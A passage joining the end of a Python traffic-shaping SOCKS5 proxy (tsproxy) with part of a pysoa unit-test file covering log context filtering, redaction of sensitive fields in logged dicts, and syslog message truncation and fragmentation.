port_offset = 20
self.ip = ''
for i in range(16):
self.ip += '{0:02x}'.format(ord(data[4 + i]))
if i % 2 and i < 15:
self.ip += ':'
if port_offset and connections[self.client_id]['server'] is not None:
self.port = 256 * ord(data[port_offset]) + ord(data[port_offset + 1])
if self.port:
if self.ip is None and self.hostname is not None:
if self.hostname in dns_cache:
self.state = self.STATE_CONNECTING
cache_entry = dns_cache[self.hostname]
self.addresses = cache_entry['addresses']
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port, 'localhost': cache_entry['localhost']})
else:
self.state = self.STATE_RESOLVING
self.SendMessage('resolve', {'hostname': self.hostname, 'port': self.port})
elif self.ip is not None:
self.state = self.STATE_CONNECTING
logging.debug('[{0:d}] Socks Connect - calling getaddrinfo for {1}:{2:d}'.format(self.client_id, self.ip, self.port))
self.addresses = socket.getaddrinfo(self.ip, self.port)
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port})
else:
return
except:
pass
def handle_close(self):
logging.info('[{0:d}] Browser Connection Closed by browser'.format(self.client_id))
self.state = self.STATE_ERROR
self.close()
try:
if self.client_id in connections:
if 'client' in connections[self.client_id]:
del connections[self.client_id]['client']
if 'server' in connections[self.client_id]:
self.SendMessage('closed', {})
else:
del connections[self.client_id]
except:
pass
def HandleResolved(self, message):
global dns_cache
if self.state == self.STATE_RESOLVING:
if 'addresses' in message and len(message['addresses']):
self.state = self.STATE_CONNECTING
self.addresses = message['addresses']
dns_cache[self.hostname] = {'addresses': self.addresses, 'localhost': message['localhost']}
logging.debug('[{0:d}] Resolved {1}, Connecting'.format(self.client_id, self.hostname))
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port, 'localhost': message['localhost']})
else:
# Send host unreachable error
self.state = self.STATE_ERROR
self.buffer += chr(0x05) + chr(0x04) + self.requested_address
self.handle_write()
def HandleConnected(self, message):
if 'success' in message and self.state == self.STATE_CONNECTING:
response = chr(0x05)
if message['success']:
response += chr(0x00)
logging.debug('[{0:d}] Connected to {1}'.format(self.client_id, self.hostname))
self.state = self.STATE_CONNECTED
else:
response += chr(0x04)
self.state = self.STATE_ERROR
response += chr(0x00)
response += self.requested_address
self.buffer += response
self.handle_write()
########################################################################################################################
# stdin command processor
########################################################################################################################
class CommandProcessor():
def __init__(self):
thread = threading.Thread(target = self.run, args=())
thread.daemon = True
thread.start()
def run(self):
global must_exit
while not must_exit:
for line in iter(sys.stdin.readline, ''):
self.ProcessCommand(line.strip())
def ProcessCommand(self, input):
global in_pipe
global out_pipe
global needs_flush
global REMOVE_TCP_OVERHEAD
global port_mappings
global server
if len(input):
ok = False
try:
command = input.split()
if len(command) and len(command[0]):
if command[0].lower() == 'flush':
ok = True
elif command[0].lower() == 'set' and len(command) >= 3:
if command[1].lower() == 'rtt' and len(command[2]):
rtt = float(command[2])
latency = rtt / 2000.0
in_pipe.latency = latency
out_pipe.latency = latency
ok = True
elif command[1].lower() == 'inkbps' and len(command[2]):
in_pipe.kbps = float(command[2]) * REMOVE_TCP_OVERHEAD
ok = True
elif command[1].lower() == 'outkbps' and len(command[2]):
out_pipe.kbps = float(command[2]) * REMOVE_TCP_OVERHEAD
ok = True
elif command[1].lower() == 'mapports' and len(command[2]):
SetPortMappings(command[2])
ok = True
elif command[0].lower() == 'reset' and len(command) >= 2:
if command[1].lower() == 'rtt' or command[1].lower() == 'all':
in_pipe.latency = 0
out_pipe.latency = 0
ok = True
if command[1].lower() == 'inkbps' or command[1].lower() == 'all':
in_pipe.kbps = 0
ok = True
if command[1].lower() == 'outkbps' or command[1].lower() == 'all':
out_pipe.kbps = 0
ok = True
if command[1].lower() == 'mapports' or command[1].lower() == 'all':
port_mappings = {}
ok = True
if ok:
needs_flush = True
except:
pass
if not ok:
PrintMessage('ERROR')
# open and close a local socket which will interrupt the long polling loop to process the flush
if needs_flush:
s = socket.socket()
s.connect((server.ipaddr, server.port))
s.close()
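# Example session (sketch) on tsproxy's stdin:
#   set rtt 200      -> 100 ms of latency is applied in each direction
#   set inkbps 5000  -> inbound bandwidth is shaped to ~5000 kbps (minus TCP overhead)
#   reset all        -> all shaping is disabled; tsproxy prints 'OK' once the flush completes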
########################################################################################################################
# Main Entry Point
########################################################################################################################
def main():
global server
global options
global in_pipe
global out_pipe
global dest_addresses
global port_mappings
global map_localhost
import argparse
global REMOVE_TCP_OVERHEAD
parser = argparse.ArgumentParser(description='Traffic-shaping socks5 proxy.',
prog='tsproxy')
parser.add_argument('-v', '--verbose', action='count', help="Increase verbosity (specify multiple times for more). -vvvv for full debug output.")
parser.add_argument('--logfile', help="Write log messages to given file instead of stdout.")
parser.add_argument('-b', '--bind', default='localhost', help="Server interface address (defaults to localhost).")
parser.add_argument('-p', '--port', type=int, default=1080, help="Server port (defaults to 1080, use 0 for randomly assigned).")
parser.add_argument('-r', '--rtt', type=float, default=.0, help="Round Trip Time Latency (in ms).")
parser.add_argument('-i', '--inkbps', type=float, default=.0, help="Download Bandwidth (in 1000 bits/s - Kbps).")
parser.add_argument('-o', '--outkbps', type=float, default=.0, help="Upload Bandwidth (in 1000 bits/s - Kbps).")
parser.add_argument('-w', '--window', type=int, default=10, help="Emulated TCP initial congestion window (defaults to 10).")
parser.add_argument('-d', '--desthost', help="Redirect all outbound connections to the specified host.")
parser.add_argument('-m', '--mapports', help="Remap outbound ports. Comma-separated list of original:new with * as a wildcard. --mapports '443:8443,*:8080'")
parser.add_argument('-l', '--localhost', action='store_true', default=False,
help="Include connections already destined for localhost/127.0.0.1 in the host and port remapping.")
options = parser.parse_args()
# Set up logging
log_level = logging.CRITICAL
if options.verbose == 1:
log_level = logging.ERROR
elif options.verbose == 2:
log_level = logging.WARNING
elif options.verbose == 3:
log_level = logging.INFO
elif options.verbose >= 4:
log_level = logging.DEBUG
if options.logfile is not None:
logging.basicConfig(filename=options.logfile, level=log_level,
format="%(asctime)s.%(msecs)03d - %(message)s", datefmt="%H:%M:%S")
else:
logging.basicConfig(level=log_level, format="%(asctime)s.%(msecs)03d - %(message)s", datefmt="%H:%M:%S")
# Parse any port mappings
if options.mapports:
SetPortMappings(options.mapports)
map_localhost = options.localhost
# Resolve the address for a rewrite destination host if one was specified
if options.desthost:
logging.debug('Startup - calling getaddrinfo for {0}:{1:d}'.format(options.desthost, GetDestPort(80)))
dest_addresses = socket.getaddrinfo(options.desthost, GetDestPort(80))
# Set up the pipes. 1/2 of the latency gets applied in each direction (and /1000 to convert to seconds)
in_pipe = TSPipe(TSPipe.PIPE_IN, options.rtt / 2000.0, options.inkbps * REMOVE_TCP_OVERHEAD)
out_pipe = TSPipe(TSPipe.PIPE_OUT, options.rtt / 2000.0, options.outkbps * REMOVE_TCP_OVERHEAD)
signal.signal(signal.SIGINT, signal_handler)
server = Socks5Server(options.bind, options.port)
command_processor = CommandProcessor()
PrintMessage('Started Socks5 proxy server on {0}:{1:d}\nHit Ctrl-C to exit.'.format(server.ipaddr, server.port))
run_loop()
def signal_handler(signal, frame):
global server
global must_exit
logging.error('Exiting...')
must_exit = True
del server
# Wrapper around the asyncore loop that lets us poll the in/out pipes every 1ms
def run_loop():
global must_exit
global in_pipe
global out_pipe
global needs_flush
global flush_pipes
global last_activity
winmm = None
# increase the windows timer resolution to 1ms
if platform.system() == "Windows":
try:
import ctypes
winmm = ctypes.WinDLL('winmm')
winmm.timeBeginPeriod(1)
except:
pass
last_activity = time.clock()
last_check = time.clock()
# disable gc to avoid pauses during traffic shaping/proxying
gc.disable()
while not must_exit:
# Tick every 1ms if traffic-shaping is enabled and we have data or are doing background dns lookups, every 1 second otherwise
lock.acquire()
tick_interval = 0.001
if background_activity_count == 0:
if in_pipe.next_message is None and in_pipe.queue.empty() and out_pipe.next_message is None and out_pipe.queue.empty():
tick_interval = 1.0
elif in_pipe.kbps == .0 and in_pipe.latency == 0 and out_pipe.kbps == .0 and out_pipe.latency == 0:
tick_interval = 1.0
lock.release()
asyncore.poll(tick_interval, asyncore.socket_map)
if needs_flush:
flush_pipes = True
needs_flush = False
out_pipe.tick()
in_pipe.tick()
if flush_pipes:
PrintMessage('OK')
flush_pipes = False
# Every 500 ms check to see if it is a good time to do a gc
now = time.clock()
if now - last_check > 0.5:
last_check = now
# manually gc after 5 seconds of idle
if now - last_activity >= 5:
last_activity = now
logging.debug("Triggering manual GC")
gc.collect()
if winmm is not None:
winmm.timeEndPeriod(1)
def GetDestPort(port):
global port_mappings
if port_mappings is not None:
src_port = str(port)
if src_port in port_mappings:
return port_mappings[src_port]
elif 'default' in port_mappings:
return port_mappings['default']
return port
def SetPortMappings(map_string):
global port_mappings
port_mappings = {}
map_string = map_string.strip('\'" \t\r\n')
for pair in map_string.split(','):
(src, dest) = pair.split(':')
if src == '*':
port_mappings['default'] = int(dest)
logging.debug("Default port mapped to port {0}".format(dest))
else:
logging.debug("Port {0} mapped to port {1}".format(src, dest))
port_mappings[src] = int(dest)
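# Example (sketch): SetPortMappings('443:8443,*:8080') maps outbound port 443 to
# 8443 and every other port to 8080, so GetDestPort(443) returns 8443 and
# GetDestPort(80) returns 8080.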
if '__main__' == __name__:
main()
|
test_logging.py | from __future__ import (
absolute_import,
unicode_literals,
)
import gc
from logging import (
WARNING,
Formatter,
LogRecord,
)
import logging.handlers
import socket
import threading
import unittest
import six
from pysoa.common.logging import (
PySOALogContextFilter,
RecursivelyCensoredDictWrapper,
SyslogHandler,
)
from pysoa.test.compatibility import mock
class TestPySOALogContextFilter(unittest.TestCase):
def tearDown(self):
# Make sure that if anything goes wrong with these tests, that it doesn't affect any other tests
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
PySOALogContextFilter.clear_logging_request_context()
def test_threading(self):
thread_data = {}
def fn(*_, **__):
thread_data['first_get'] = PySOALogContextFilter.get_logging_request_context()
PySOALogContextFilter.set_logging_request_context(foo='bar', **{'baz': 'qux'})
thread_data['second_get'] = PySOALogContextFilter.get_logging_request_context()
if thread_data.get('do_clear'):
PySOALogContextFilter.clear_logging_request_context()
thread_data['third_get'] = PySOALogContextFilter.get_logging_request_context()
self.assertIsNone(PySOALogContextFilter.get_logging_request_context())
PySOALogContextFilter.set_logging_request_context(request_id=1234, **{'correlation_id': 'abc'})
self.assertEqual(
{'request_id': 1234, 'correlation_id': 'abc'},
PySOALogContextFilter.get_logging_request_context()
)
thread = threading.Thread(target=fn)
thread.start()
thread.join()
self.assertEqual(
{'request_id': 1234, 'correlation_id': 'abc'},
PySOALogContextFilter.get_logging_request_context()
)
self.assertIsNone(thread_data['first_get'])
self.assertEqual({'foo': 'bar', 'baz': 'qux'}, thread_data['second_get'])
self.assertEqual({'foo': 'bar', 'baz': 'qux'}, thread_data['third_get'])
thread_data['do_clear'] = True
thread = threading.Thread(target=fn)
thread.start()
thread.join()
self.assertEqual(
{'request_id': 1234, 'correlation_id': 'abc'},
PySOALogContextFilter.get_logging_request_context()
)
self.assertIsNone(thread_data['first_get'])
self.assertEqual({'foo': 'bar', 'baz': 'qux'}, thread_data['second_get'])
self.assertIsNone(thread_data['third_get'])
def test_filter(self):
record = mock.MagicMock()
log_filter = PySOALogContextFilter()
self.assertTrue(log_filter.filter(record))
self.assertEqual('--', record.correlation_id)
self.assertEqual('--', record.request_id)
self.assertEqual('unknown', record.service_name)
PySOALogContextFilter.set_service_name('foo_qux')
PySOALogContextFilter.set_logging_request_context(filter='mine', **{'logger': 'yours'})
self.assertEqual({'filter': 'mine', 'logger': 'yours'}, PySOALogContextFilter.get_logging_request_context())
record.reset_mock()
self.assertTrue(log_filter.filter(record))
self.assertEqual('--', record.correlation_id)
self.assertEqual('--', record.request_id)
self.assertEqual('foo_qux', record.service_name)
PySOALogContextFilter.set_logging_request_context(request_id=4321, **{'correlation_id': 'abc1234'})
self.assertEqual(
{'request_id': 4321, 'correlation_id': 'abc1234'},
PySOALogContextFilter.get_logging_request_context()
)
record.reset_mock()
self.assertTrue(log_filter.filter(record))
self.assertEqual('abc1234', record.correlation_id)
self.assertEqual(4321, record.request_id)
self.assertEqual('foo_qux', record.service_name)
PySOALogContextFilter.clear_logging_request_context()
self.assertEqual({'filter': 'mine', 'logger': 'yours'}, PySOALogContextFilter.get_logging_request_context())
record.reset_mock()
self.assertTrue(log_filter.filter(record))
self.assertEqual('--', record.correlation_id)
self.assertEqual('--', record.request_id)
self.assertEqual('foo_qux', record.service_name)
PySOALogContextFilter.clear_logging_request_context()
self.assertIsNone(PySOALogContextFilter.get_logging_request_context())
record.reset_mock()
self.assertTrue(log_filter.filter(record))
self.assertEqual('--', record.correlation_id)
self.assertEqual('--', record.request_id)
self.assertEqual('foo_qux', record.service_name)
class TestRecursivelyCensoredDictWrapper(unittest.TestCase):
def test_non_dict(self):
with self.assertRaises(ValueError):
# noinspection PyTypeChecker
RecursivelyCensoredDictWrapper(['this', 'is', 'a', 'list'])
def test_simple_dict(self):
original = {
'hello': 'world',
'password': 'censor!',
'credit_card': '1234567890123456',
'passphrase': True,
'cvv': 938,
}
wrapped = RecursivelyCensoredDictWrapper(original)
expected = {
'hello': 'world',
'password': '**********',
'credit_card': '**********',
'passphrase': True,
'cvv': '**********',
}
self.assertEqual(expected, eval(repr(wrapped)))
self.assertEqual(repr(wrapped), str(wrapped))
if six.PY2:
self.assertEqual(six.text_type(repr(wrapped)), six.text_type(wrapped))
else:
self.assertEqual(six.binary_type(repr(wrapped), 'utf-8'), six.binary_type(wrapped))
# Make sure the original dict wasn't modified
self.assertEqual(
{
'hello': 'world',
'password': 'censor!',
'credit_card': '1234567890123456',
'passphrase': True,
'cvv': 938,
},
original,
)
def test_complex_dict(self):
original = {
'a_list': [
'a',
True,
109.8277,
{'username': 'nick', 'passphrase': 'this should be censored'},
{'username': 'allison', 'passphrase': ''},
],
'a_set': {
'b',
False,
18273,
},
'a_tuple': (
'c',
True,
42,
{'cc_number': '9876543210987654', 'cvv': '987', 'expiration': '12-20', 'pin': '4096'},
),
'passwords': ['Make It Censored', None, '', 'Hello, World!'],
'credit_card_numbers': ('1234', '5678', '9012'),
'cvv2': {'a', None, '', 'b'},
'pin': frozenset({'c', 'd', ''}),
'foo': 'bar',
'passphrases': {
'not_sensitive': 'not censored',
'bankAccount': 'this should also be censored',
}
}
wrapped = RecursivelyCensoredDictWrapper(original)
expected = {
'a_list': [
'a',
True,
109.8277,
{'username': 'nick', 'passphrase': '**********'},
{'username': 'allison', 'passphrase': ''},
],
'a_set': {
'b',
False,
18273,
},
'a_tuple': (
'c',
True,
42,
{'cc_number': '**********', 'cvv': '**********', 'expiration': '12-20', 'pin': '**********'},
),
'passwords': ['**********', None, '', '**********'],
'credit_card_numbers': ('**********', '**********', '**********'),
'cvv2': {'**********', None, '', '**********'},
'pin': frozenset({'**********', '**********', ''}),
'foo': 'bar',
'passphrases': {
'not_sensitive': 'not censored',
'bankAccount': '**********',
}
}
self.assertEqual(expected, eval(repr(wrapped)))
self.assertEqual(repr(wrapped), str(wrapped))
if six.PY2:
self.assertEqual(six.text_type(repr(wrapped)), six.text_type(wrapped))
else:
self.assertEqual(six.binary_type(repr(wrapped), 'utf-8'), six.binary_type(wrapped))
self.assertEqual(
{
'a_list': [
'a',
True,
109.8277,
{'username': 'nick', 'passphrase': 'this should be censored'},
{'username': 'allison', 'passphrase': ''},
],
'a_set': {
'b',
False,
18273,
},
'a_tuple': (
'c',
True,
42,
{'cc_number': '9876543210987654', 'cvv': '987', 'expiration': '12-20', 'pin': '4096'},
),
'passwords': ['Make It Censored', None, '', 'Hello, World!'],
'credit_card_numbers': ('1234', '5678', '9012'),
'cvv2': {'a', None, '', 'b'},
'pin': frozenset({'c', 'd', ''}),
'foo': 'bar',
'passphrases': {
'not_sensitive': 'not censored',
'bankAccount': 'this should also be censored',
}
},
original,
)
class TestSyslogHandler(object):
"""
It's weird that we're messing with garbage collection here, but it's necessary. The problem is that the PySOA
server starts an async event loop in Python 3.6+, and some of the tests in this project unavoidably and
incidentally exercise that code. When event loops are garbage collected, their `__del__` methods `close` their
selectors, which are anonymous unix sockets.
Enter this test class. In order to test the custom `SyslogHandler`, it is necessary to `mock.patch` sockets and,
due to design decisions made by the Python folks who wrote the socket code and the base CPython `SyslogHandler`,
it is impossible to do this patching in a way that doesn't affect all sockets everywhere. Turns out that garbage
collection has a tendency to run during this test class, and seems to be timed perfectly to happen while sockets
are patched, causing errors and test failures.
To prevent these errors and test failures, we do three things:
- Preemptively run garbage collection once before any tests in the class, so that we don't use too much memory
during the class.
    - Disable garbage collection at the start of each test to ensure it cannot run during the test.
    - Enable garbage collection at the end of each test to give it a chance to run if it needs to.
"""
@classmethod
def setup_class(cls):
gc.collect()
# noinspection PyMethodMayBeStatic
def setup_method(self, _method):
gc.disable()
# noinspection PyMethodMayBeStatic
def teardown_method(self, _method):
gc.enable()
def test_constructor(self):
handler = SyslogHandler()
assert handler.socktype == socket.SOCK_DGRAM
if six.PY2:
assert not handler.unixsocket
else:
assert handler.unixsocket is False
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
assert handler.maximum_length >= 1252 # (1280 - 28)
handler = SyslogHandler(overflow=SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE)
assert handler.socktype == socket.SOCK_DGRAM
if six.PY2:
assert not handler.unixsocket
else:
assert handler.unixsocket is False
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
assert handler.maximum_length >= 1252 # (1280 - 28)
with mock.patch.object(socket.socket, 'connect'):
handler = SyslogHandler(socket_type=socket.SOCK_STREAM)
assert handler.socktype == socket.SOCK_STREAM
if six.PY2:
assert not handler.unixsocket
else:
assert handler.unixsocket is False
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
assert handler.maximum_length == 1024 * 1024
handler = SyslogHandler(address='/path/to/unix.socket')
assert handler.socktype == socket.SOCK_DGRAM
assert handler.unixsocket is True or handler.unixsocket == 1 # Python 2 compatibility
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
assert handler.maximum_length == 1024 * 1024
handler = SyslogHandler(address='/path/to/unix.socket', socket_type=socket.SOCK_STREAM)
assert handler.socktype == socket.SOCK_STREAM
assert handler.unixsocket is True or handler.unixsocket == 1 # Python 2 compatibility
assert handler.overflow == SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
assert handler.maximum_length == 1024 * 1024
def test_emit_shorter_than_limit(self):
handler = SyslogHandler()
handler.maximum_length = 500
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a fairly short message',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
mock_send.assert_called_once_with([
priority + b'foo_file: bar_service WARNING This is a fairly short message\000',
])
def test_emit_longer_than_limit_truncate(self):
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
handler.ident = '5678'
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message that is going to exceed the maximum byte count and will need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b'5678foo_file: bar_service WARNING This is a much longer message that is going to exceed the max\000'
)
assert len(expected1) == 100
mock_send.assert_called_once_with([
expected1,
])
def test_emit_longer_than_limit_truncate_unicode_within(self):
# b'\xf0\x9f\x98\xb1' = u'\U0001f631' = shocked face with hands to cheeks
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
handler.ident = '5678'
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message \U0001f631 that is going to exceed the maximum byte count and will '
'need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b'5678foo_file: bar_service WARNING This is a much longer message \xf0\x9f\x98\xb1 that is going to '
b'exceed th\000'
)
assert len(expected1) == 100
mock_send.assert_called_once_with([
expected1,
])
def test_emit_longer_than_limit_truncate_unicode_at_boundary(self):
# b'\xf0\x9f\x98\xb1' = u'\U0001f631' = shocked face with hands to cheeks
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_TRUNCATE
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
handler.ident = '5678'
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message that is going to exceed the \U0001f631 maximum byte count and will '
'need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b'5678foo_file: bar_service WARNING This is a much longer message that is going to exceed the \000'
)
assert len(expected1) == 97
mock_send.assert_called_once_with([
expected1,
])
def test_emit_longer_than_limit_fragment(self):
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message that is going to exceed the maximum byte count and will need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b"foo_file: bar_service WARNING This is a much longer message that is going to exceed... (cont'd)\000"
)
assert len(expected1) == 100
expected2 = (
priority +
b"foo_file: bar_service WARNING (cont'd #2) ... the maximum byte count and will need ... (cont'd)\000"
)
assert len(expected2) == 100
expected3 = (
priority +
b"foo_file: bar_service WARNING (cont'd #3) ...truncating\000"
)
assert len(expected3) < 100
mock_send.assert_called_once_with([
expected1,
expected2,
expected3,
])
def test_emit_longer_than_limit_fragment_unicode_within(self):
# b'\xf0\x9f\x98\xb1' = u'\U0001f631' = shocked face with hands to cheeks
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message \U0001f631 that is going to exceed the maximum byte count and will '
'need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b"foo_file: bar_service WARNING This is a much longer message \xf0\x9f\x98\xb1 that is going to "
b"e... (cont'd)\000"
)
assert len(expected1) == 100
expected2 = (
priority +
b"foo_file: bar_service WARNING (cont'd #2) ...xceed the maximum byte count and will ... (cont'd)\000"
)
assert len(expected2) == 100
expected3 = (
priority +
b"foo_file: bar_service WARNING (cont'd #3) ...need truncating\000"
)
assert len(expected3) < 100
mock_send.assert_called_once_with([
expected1,
expected2,
expected3,
])
def test_emit_longer_than_limit_fragment_unicode_at_boundary(self):
# b'\xf0\x9f\x98\xb1' = u'\U0001f631' = shocked face with hands to cheeks
handler = SyslogHandler()
handler.maximum_length = 100
handler.overflow = SyslogHandler.OVERFLOW_BEHAVIOR_FRAGMENT
handler.formatter = Formatter('foo_file: %(name)s %(levelname)s %(message)s')
record = LogRecord(
name='bar_service',
level=WARNING,
pathname='/path/to/file.py',
lineno=122,
msg='This is a much longer message that yes is going to \U0001f631 exceed the maximum byte count and will '
'need truncating',
args=(),
exc_info=None,
)
with mock.patch.object(handler, '_send') as mock_send:
handler.emit(record)
priority = '<{:d}>'.format(
handler.encodePriority(handler.facility, handler.mapPriority(record.levelname)),
).encode('utf-8')
expected1 = (
priority +
b"foo_file: bar_service WARNING This is a much longer message that yes is going to ... (cont'd)\000"
)
assert len(expected1) == 98
expected2 = (
priority +
b"foo_file: bar_service WARNING (cont'd #2) ...\xf0\x9f\x98\xb1 exceed the maximum byte count and"
b"... (cont'd)\000"
)
assert len(expected2) == 100
expected3 = (
priority +
b"foo_file: bar_service WARNING (cont'd #3) ... will need truncating\000"
)
assert len(expected3) < 100
mock_send.assert_called_once_with([
expected1,
expected2,
expected3,
])
# noinspection PyProtectedMember
def test_send_udp(self):
handler = SyslogHandler(address=('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT))
with mock.patch.object(socket.socket, 'sendto') as mock_send_to:
handler._send(['this is the first part', 'here is another part', 'one more part'])
mock_send_to.assert_has_calls([
mock.call('this is the first part', ('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT)),
mock.call('here is another part', ('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT)),
mock.call('one more part', ('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT)),
])
# noinspection PyProtectedMember
def test_send_tcp(self):
with mock.patch.object(socket.socket, 'connect') as mock_connect:
handler = SyslogHandler(
address=('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT),
socket_type=socket.SOCK_STREAM,
)
mock_connect.assert_called_once_with(('127.0.0.1', logging.handlers.SYSLOG_UDP_PORT))
with mock.patch.object(socket.socket, 'sendall') as mock_send_all:
handler._send(['this is the first part', 'here is another part', 'one more part'])
mock_send_all.assert_has_calls([
mock.call('this is the first part'),
mock.call('here is another part'),
mock.call('one more part'),
])
# noinspection PyProtectedMember
def test_send_unix(self):
with mock.patch.object(socket.socket, 'connect') as mock_connect:
handler = SyslogHandler(address='/path/to/unix.socket')
mock_connect.assert_called_once_with('/path/to/unix.socket')
with mock.patch.object(socket.socket, 'send') as mock_send:
handler._send(['this is the first part', 'here is another part', 'one more part'])
mock_send.assert_has_calls([
mock.call('this is the first part'),
mock.call('here is another part'),
mock.call('one more part'),
])
# noinspection PyProtectedMember
def test_send_unix_with_failure_part_way_through(self):
with mock.patch.object(socket.socket, 'connect') as mock_connect:
handler = SyslogHandler(address='/path/to/a/different.socket')
mock_connect.assert_called_once_with('/path/to/a/different.socket')
# This is weird. Creating a new socket actually dynamically creates the `send` method, which breaks mocking.
# So we have to mock the send, connect, and close methods, and then when the send returns an error on the
# second call, the close method has to de-mock send so that a new socket can be created, and then the
# connection method has to re-mock send so that we can capture the send retries. Yuck.
first_mock_send_patch = mock.patch.object(socket.socket, 'send')
second_mock_send_patch = mock.patch.object(socket.socket, 'send')
mock_sends = {'first_mock_send': None, 'second_mock_send': None}
def close_side_effect(*_, **__):
first_mock_send_patch.stop()
def connect_side_effect(*_, **__):
mock_sends['second_mock_send'] = second_mock_send_patch.start()
mock_sends['second_mock_send'].side_effect = [True, True]
try:
with mock.patch.object(socket.socket, 'close') as mock_close, \
mock.patch.object(socket.socket, 'connect') as mock_reconnect:
mock_sends['first_mock_send'] = first_mock_send_patch.start()
mock_sends['first_mock_send'].side_effect = [True, OSError()]
mock_close.side_effect = close_side_effect
mock_reconnect.side_effect = connect_side_effect
handler._send(['this is the first part', 'here is another part', 'one more part'])
finally:
mock.patch.stopall()
mock_sends['first_mock_send'].assert_has_calls([
mock.call('this is the first part'),
mock.call('here is another part'),
])
mock_sends['second_mock_send'].assert_has_calls([
mock.call('here is another part'),
mock.call('one more part'),
])
mock_reconnect.assert_called_once_with('/path/to/a/different.socket')
mock_close.assert_called_once_with()
# noinspection PyProtectedMember
def test_cleanly_slice_encoded_string(self):
# b'\xf0\x9f\xa4\xae' = barf face
# b'\xf0\x9f\x98\xbb' = cat with heart eyes
# b'\xf0\x9f\x9b\x8c' = bed
# b'\xf0\x9f\x92\xb8' = money with wings
# b'\xe2\x9c\x8d\xf0\x9f\x8f\xbb' = hand writing with pen, lightest skin
# b'\xe2\x9c\x8d\xf0\x9f\x8f\xbf' = hand writing with pen, darkest skin
assert SyslogHandler._cleanly_slice_encoded_string(
b'Hello world, this has no multi-byte characters',
15
) == (
b'Hello world, th',
b'is has no multi-byte characters',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'Hello world, this has no multi-byte characters',
16
) == (
b'Hello world, thi',
b's has no multi-byte characters',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'Hello world, this has no multi-byte characters',
17
) == (
b'Hello world, this',
b' has no multi-byte characters',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'Hello world, this has no multi-byte characters',
18
) == (
b'Hello world, this ',
b'has no multi-byte characters',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
12
) == (
b'This string ',
b'\xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
